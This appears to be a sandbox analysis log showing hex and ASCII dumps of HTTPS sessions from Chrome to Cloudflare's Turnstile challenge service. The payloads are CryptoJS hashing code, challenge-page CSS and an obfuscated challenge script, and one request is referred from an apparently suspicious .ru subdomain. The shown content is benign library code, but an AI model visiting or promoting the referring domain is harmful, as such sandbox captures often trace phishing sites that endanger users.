                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79
                                                                              Data Ascii: fer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e
                                                                              Data Ascii: .charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMN
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74
                                                                              Data Ascii: s(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=t
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35
                                                                              Data Ascii: 9]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.649826104.18.95.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:28 UTC800OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: iframe
                                                                              Referer: https://hbv.julfolusi.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:28 UTC1362INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:28 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 26768
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                              cross-origin-embedder-policy: require-corp
                                                                              cross-origin-opener-policy: same-origin
                                                                              cross-origin-resource-policy: cross-origin
                                                                              origin-agent-cluster: ?1
                                                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              referrer-policy: same-origin
                                                                              document-policy: js-profiling
                                                                              2025-01-20 13:17:28 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 34 66 35 38 34 65 63 65 66 37 38 63 38 34 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                              Data Ascii: Server: cloudflareCF-RAY: 904f584ecef78c84-EWRalt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:28 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                              Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                              Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                              Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                              Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                              Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                              Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                              Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                              Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.649828104.18.95.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:29 UTC731OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=904f584ecef78c84&lang=auto HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:29 UTC331INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:29 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 122870
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f58535d7042c1-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:29 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 4b 4d 72 57 68 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.KMrWh3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                              2025-01-20 13:17:29 UTC1369INData Raw: 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72
                                                                              Data Ascii: ","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_expired":"Expired","turnstile_overrun_description":"Stuck%20here%3F","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20par
                                                                              2025-01-20 13:17:29 UTC1369INData Raw: 2c 66 42 2c 66 4c 2c 66 57 2c 67 30 2c 67 31 2c 67 34 2c 67 35 2c 67 45 2c 67 32 2c 67 33 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 35 37 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 38 37 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 34 36 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 35 35 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 34 35 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 33 37 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 30 34 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67
